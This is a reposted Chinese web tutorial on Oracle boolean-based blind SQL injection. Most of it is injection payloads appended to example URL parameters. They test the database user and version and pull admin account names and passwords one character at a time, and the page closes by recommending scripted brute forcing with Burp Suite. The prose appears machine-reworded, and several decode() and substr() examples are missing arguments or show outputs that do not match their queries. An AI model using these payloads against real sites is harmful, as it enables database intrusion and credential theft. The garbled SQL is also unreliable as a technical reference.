加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长百科 > 正文

Oracle基于布尔的盲注总结

发布时间:2021-03-07 23:16:36 所属栏目:站长百科 来源:网络整理
导读:0x01 decode?函数布尔盲注 decode (字段或字段的运算,值1,值2,值3) 这个函数运行的功效是,当字段或字段的运算的值便是值1时,该函数返回值2,不然返回3 虽然值1,值2,值3也可所以表达式,这个函数使得某些sql语句简朴了很多 行使要领: 较量巨细 selec
副问题[/!--empirenews.page--]

0x01 decode?函数布尔盲注

decode(字段或字段的运算,值1,值2,值3)

这个函数运行的功效是,当字段或字段的运算的值便是值1时,该函数返回值2,不然返回3

虽然值1,值2,值3也可所以表达式,这个函数使得某些sql语句简朴了很多
行使要领:
较量巨细

select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值

sign()函数按照某个值是0、正数照旧负数,别离返回0、1、-1

譬喻:
变量1=10,变量2=20
则sign(变量1-变量2)返回-1,decode解码功效为“变量1”,到达了取较小值的目标。

SQL> select decode(sign(10-20),10,20) from dual;

DECODE(SIGN(10-20),20) ---------------------------- 10

Oracle基于布尔的盲注总结

以是这个decode函数在我们注入中的应用

?

?

测试当前用户

select decode(user,‘SYSTEM‘,1,0) from dual;

假如是system用户则返回1,不是则返回0.

SQL> select decode(user,‘SYSTEM‘,1,0) from dual;

DECODE(USER,0) ------------------------- 1 SQL> select decode(user,‘SYS‘,0) from dual; DECODE(USER,0) ---------------------- 0

Oracle基于布尔的盲注总结

注入点中decode盲注应用

判定是否是SCOTT用户

http://www.jsporcle.com/a.jsp?username=SMITH‘ and 1=(select decode(user,‘SCOTT‘,0) from dual) --

Oracle基于布尔的盲注总结

当前也可以用字符逐个猜解,操作到substr()函数

http://www.jsporcle.com/a.jsp?username=SMITH‘ and 1=(select decode(substr(user,1),‘S‘,0) from dual) --

Oracle基于布尔的盲注总结

这里只必要替代我们必要查的内容即可?纷歧一罗列了,好比查询Oracle版本,判定版本的字符串第一个字符是否是O

http://www.jsporcle.com/a.jsp?username=SMITH‘ and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),‘O‘,0) from dual) --

Oracle基于布尔的盲注总结

获取当前用户

(select user from dual)

获取当前版本

(select banner from sys.v_$version where rownum=1)
获取当前admin表的帐号和暗码

(select username||password from admin)
获取字符长度

select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --

http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --

Oracle基于布尔的盲注总结

当前用户第一个字母的是否便是S 便是返回1不然返回0

(select decode(substr(user,1),‘S‘,0) from dual) --
(select decode(substr(user,2,‘Y‘,3,4,‘T‘,5,‘E‘,6,‘N‘,0) from dual) --

测试当前用户语句

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,0) from dual) --

获取当前admin表的帐号和暗码

select * from art where id=1 and 1=(select decode(substr((select username||password from admin),‘a‘,0) from dual)
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),0) from dual)

Oracle基于布尔的盲注总结

判定字符的字符

abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.

查询第二个的时辰

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),‘d‘,0) from dual) --

Oracle基于布尔的盲注总结

?

?或许知道这些函数的用法?跑剧本爆破即可?burpsuite为例

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.hunanwang.cn/ All Rights Reserved. 湖南网